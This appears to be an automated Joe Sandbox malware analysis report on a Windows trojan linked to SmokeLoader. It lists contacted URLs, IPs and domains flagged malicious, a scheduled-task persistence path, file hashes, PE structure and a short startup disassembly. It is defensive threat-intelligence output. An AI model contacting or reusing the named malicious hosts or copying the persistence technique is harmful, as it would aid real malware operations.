                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfvexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://android.notify.windows.com/iOSJMexplorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://powerpoint.office.comexplorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bannexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://outlook.comexplorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://qburaxgwiulsnc.com/lexplorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://android.notify.windows.com/iOSZMexplorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-fexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-woexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://www.yelp.comexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hIexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
IP              Domain                   Country  Flag  ASN     ASN Name    Malicious
188.40.141.211  ceoconstractionstore.pl  Germany  DE    24940   HETZNER-AS  true
193.46.217.78   unicexpertmagazine.pw    Spain    ES    203178  CUBENODE    true
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1525800
                                                                                                                Start date and time:2024-10-04 15:08:31 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 6m 15s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:1
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:RmbF3635xY.exe
                                                                                                                renamed because original name is a hash value
                                                                                                                Original Sample Name:f488b4eb65d5f5339401fc0869e614433719e64a5156945b530f98c7d39452e1.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.evad.winEXE@2/2@2/2
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 65
                                                                                                                • Number of non-executed functions: 15
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • VT rate limit hit for: RmbF3635xY.exe
Time      Type             Description
09:10:01  API Interceptor  865x Sleep call for process: explorer.exe modified
14:10:05  Task Scheduler   Run new task: Firefox Default Browser Agent C33671130B42FF4D path: C:\Users\user\AppData\Roaming\jtruajj
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                188.40.141.211abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeGet hashmaliciousCryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLoggerBrowse
                                                                                                                • gmpeople.com/upload/
                                                                                                                vwaoMjcyAw.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • selebration17io.io/index.php
Qi4Mj8hG3t.exe | malicious | SmokeLoader | selebration17io.io/index.php
br0A8E2X6I.exe | malicious | SmokeLoader | selebration17io.io/index.php
setup.exe | malicious | Babuk, Djvu | zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe | malicious | SmokeLoader | agressivemnaiq.xyz/
A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe | malicious | Bdaejec, SmokeLoader | host-data-coin-11.com/
be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exe | malicious | SmokeLoader | host-data-coin-11.com/
EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe | malicious | Bdaejec, SmokeLoader | host-data-coin-11.com/
LisectAVT_2403002B_303.exe | malicious | Bdaejec, SmokeLoader | aucmoney.com/upload/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
unicexpertmagazine.pw | 3388.PDF.hta | malicious | SmokeLoader | 185.219.7.204
unicexpertmagazine.pw | 3312.PDF.scr | malicious | SmokeLoader | 45.143.201.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE | https://indexconectada.net.br/ | malicious | Unknown | 85.10.195.17
HETZNER-ASDE | https://iasitvlife.ro | malicious | Unknown | 49.12.228.110
HETZNER-ASDE | https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/ | malicious | HTMLPhisher | 49.12.228.110
HETZNER-ASDE | Zxooek.exe | malicious | FormBook | 88.198.46.204
HETZNER-ASDE | MOfHb44mph.elf | malicious | Unknown | 144.76.53.154
HETZNER-ASDE | Full Litigation File.pdf | malicious | Unknown | 176.9.171.101
HETZNER-ASDE | file.exe | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | 49.12.197.9
HETZNER-ASDE | file.exe | malicious | LummaC, Vidar | 49.12.197.9
HETZNER-ASDE | https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845 | malicious | Unknown | 178.63.248.56
HETZNER-ASDE | msvcp110.dll | malicious | RHADAMANTHYS | 135.181.4.162
CUBENODEES | https://public-usa.mkt.dynamics.com/api/orgs/656e8c66-5e77-ef11-ac1e-6045bd080c27/r/lmUG5F4EgUesqGwuJA5PigEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fcrm.interactivaclic.com%252Fn%252F%253Fc3Y9bzM2NV8xX29uZSZyYW5kPVNUVjBVakk9JnVpZD1VU0VSMjMwOTIwMjRVMjYwOTIzMjE%253DN0123N%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=HTFuI1dWNsWznL3K1x2s1mvQbKix%2BdykwHJYfkmm7o4%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee | malicious | Unknown | 89.44.32.18
CUBENODEES | cFvDKWB1V8.ps1 | malicious | XWorm | 83.147.55.182
CUBENODEES | New_Document-660111409161.wsf | malicious | XWorm | 83.147.55.182
CUBENODEES | sora.arm.elf | malicious | Mirai | 83.147.57.108
CUBENODEES | F24_023.pdf (1).js | malicious | Unknown | 83.147.53.197
CUBENODEES | F24_023.pdf.js | malicious | Unknown | 83.147.53.197
CUBENODEES | F24_023.pdf.js | malicious | Unknown | 83.147.53.197
CUBENODEES | F24_023.pdf (1).js | malicious | Unknown | 83.147.53.197
CUBENODEES | F24_023.pdf_1.js | malicious | Unknown | 83.147.53.197
CUBENODEES | F24_023.pdf_1.js | malicious | Unknown | 83.147.53.197
                                                                                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\jtruajj | 3388.PDF.hta | malicious | SmokeLoader |
                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):222720
                                                                                                                  Entropy (8bit):6.497652873737398
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                  MD5:31059E7394B880F017E83804D9B716AB
                                                                                                                  SHA1:2C0057C276D7D2020D1E5A60CA6D44E2FB91674E
                                                                                                                  SHA-256:F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
                                                                                                                  SHA-512:A31E40888FC80CE8E138833155A63EDDC7EA9D4A37BCEB95A46E2CE937E42DFC74DF34FC9869F95940EE0F73D00F3A72839F220F09499B4F28AA1B91E5B706F9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                  Joe Sandbox View:
• Filename: 3388.PDF.hta, Detection: malicious
                                                                                                                  Reputation:low
                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):6.497652873737398
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                  • InstallShield setup (43055/19) 0.43%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:RmbF3635xY.exe
                                                                                                                  File size:222'720 bytes
                                                                                                                  MD5:31059e7394b880f017e83804d9b716ab
                                                                                                                  SHA1:2c0057c276d7d2020d1e5a60ca6d44e2fb91674e
                                                                                                                  SHA256:f488b4eb65d5f5339401fc0869e614433719e64a5156945b530f98c7d39452e1
                                                                                                                  SHA512:a31e40888fc80ce8e138833155a63eddc7ea9d4a37bceb95a46e2ce937e42dfc74df34fc9869f95940ee0f73d00f3a72839f220f09499b4f28aa1b91e5b706f9
                                                                                                                  SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                  TLSH:CF244911B9E59025EEF75B75197486942E7BBCF2AA30804E3290321F9E733D36962723
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L....`Ie...
                                                                                                                  Icon Hash:03a1879b9b6565d6
                                                                                                                  Entrypoint:0x401716
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6549601E [Mon Nov 6 21:52:30 2023 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:7529a394fc2aae97d1d4dcd49f0468b5
                                                                                                                  Instruction
                                                                                                                  call 00007F2EE87B8DCCh
                                                                                                                  jmp 00007F2EE87B4EEEh
                                                                                                                  mov edi, edi
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 00000328h
                                                                                                                  mov dword ptr [0041D888h], eax
                                                                                                                  mov dword ptr [0041D884h], ecx
                                                                                                                  mov dword ptr [0041D880h], edx
                                                                                                                  mov dword ptr [0041D87Ch], ebx
                                                                                                                  mov dword ptr [0041D878h], esi
                                                                                                                  mov dword ptr [0041D874h], edi
                                                                                                                  mov word ptr [0041D8A0h], ss
                                                                                                                  mov word ptr [0041D894h], cs
                                                                                                                  mov word ptr [0041D870h], ds
                                                                                                                  mov word ptr [0041D86Ch], es
                                                                                                                  mov word ptr [0041D868h], fs
                                                                                                                  mov word ptr [0041D864h], gs
                                                                                                                  pushfd
                                                                                                                  pop dword ptr [0041D898h]
                                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                                  mov dword ptr [0041D88Ch], eax
                                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                                  mov dword ptr [0041D890h], eax
                                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                                  mov dword ptr [0041D89Ch], eax
                                                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                                                  mov dword ptr [0041D7D8h], 00010001h
                                                                                                                  mov eax, dword ptr [0041D890h]
                                                                                                                  mov dword ptr [0041D78Ch], eax
                                                                                                                  mov dword ptr [0041D780h], C0000409h
                                                                                                                  mov dword ptr [0041D784h], 00000001h
                                                                                                                  mov eax, dword ptr [0041C008h]
                                                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                                                  mov eax, dword ptr [0041C00Ch]
                                                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                                                  call dword ptr [000000D4h]
                                                                                                                  Programming Language:
                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                  • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a744 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x115000 | 0x1a1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1a458 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x19000 | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x17edf | 0x18000 | 574a29c67171712a5ff2381296a30bab | False | 0.7909444173177084 | data | 7.486630625699931 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x19000 | 0x2022 | 0x2200 | 681a31faacd60791d3dfc5b6676241ab | False | 0.35592830882352944 | data | 5.421584991551131 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1c000 | 0xf7ff8 | 0x1800 | 8866369ebf07e3343622354c6c1cc052 | False | 0.2591145833333333 | data | 2.6775651395317706 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x114000 | 0x51d | 0x600 | 53e979547d8c2ea86560ac45de08ae25 | False | 0.013020833333333334 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x115000 | 0x1a1e0 | 0x1a200 | c9c1cc244b5a96be47b6bccc7c1df270 | False | 0.4988598983253589 | data | 5.462891080418723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AFX_DIALOG_LAYOUT | 0x127d08 | 0x2 | data | | | 5.0
ROCOCUPACOZODACAJAJ | 0x126d10 | 0xbf7 | ASCII text, with very long lines (3063), with no line terminators | Turkish | Turkey | 0.6010447273914463
SUZIZOXALIDEVODUGIDUVOJAPIPUCOFA | 0x127908 | 0x3fa | ASCII text, with very long lines (1018), with no line terminators | Turkish | Turkey | 0.6267190569744597
RT_CURSOR | 0x127d10 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x127e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0x115a20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5748933901918977
RT_ICON | 0x1168c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.6484657039711191
RT_ICON | 0x117170 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.6981566820276498
RT_ICON | 0x117838 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7536127167630058
RT_ICON | 0x117da0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5244813278008299
RT_ICON | 0x11a348 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.6282833020637899
RT_ICON | 0x11b3f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.6409836065573771
RT_ICON | 0x11bd78 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.774822695035461
RT_ICON | 0x11c258 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39712153518123666
RT_ICON | 0x11d100 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5613718411552346
RT_ICON | 0x11d9a8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6244239631336406
RT_ICON | 0x11e070 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6372832369942196
